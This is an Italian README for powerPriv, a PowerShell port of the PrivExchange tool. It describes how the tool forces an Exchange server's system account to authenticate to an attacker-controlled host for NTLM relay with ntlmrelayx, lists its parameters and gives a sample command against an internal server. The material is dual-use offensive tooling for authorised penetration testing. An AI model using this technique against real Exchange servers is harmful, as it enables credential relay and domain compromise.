
Un'implementazione in Powershell di PrivExchange progettata per essere eseguita nel contesto dell'utente corrente.
Un'implementazione in PowerShell di PrivExchange by @_dirkjan (codice originale qui: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Utile per ambienti in cui non è possibile eseguire applicazioni basate su Python, si dispone di credenziali utente o non si vogliono scrivere file su disco. Farà sì che l'account di sistema del server Exchange di destinazione tenti di autenticarsi su un sistema a scelta.
-targetHostNome host o IP del server Exchange di destinazione. In base alla configurazione DNS potrebbe essere necessario il FQDN se si utilizza il nome host. (Obbligatorio)
-attackerHostNome host o IP di un sistema da te controllato, sul quale idealmente stai eseguendo ntlmrelayx. Stiamo dicendo al server Exchange di tentare di autenticarsi su questo sistema. In base alla configurazione DNS potrebbe essere necessario il FQDN se si utilizza il nome host. (Obbligatorio)
-exchangePortPorta su cui tentare la connessione al server Exchange. Il default è 443.
-attackerPortPorta su cui Exchange dovrebbe tentare di riconnettersi all'attaccante. Il default è 80
-attackerPagePagina che stiamo dicendo al server Exchange di contattare sul nostro sistema di attacco. Le barre non sono necessarie. Il default è powerPriv.
-noSSLImpostare a true se non si desidera utilizzare https per la connessione iniziale al server Exchange. Il default è false (usa https).
-VersionVersione del server Exchange di destinazione. Il default è 2013.
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
Autore: @g0ldenGunSec - Basato sullo strumento creato da @_dirkjan
Utilizza questo strumento solo su reti di tua proprietà o per le quali hai il permesso di test.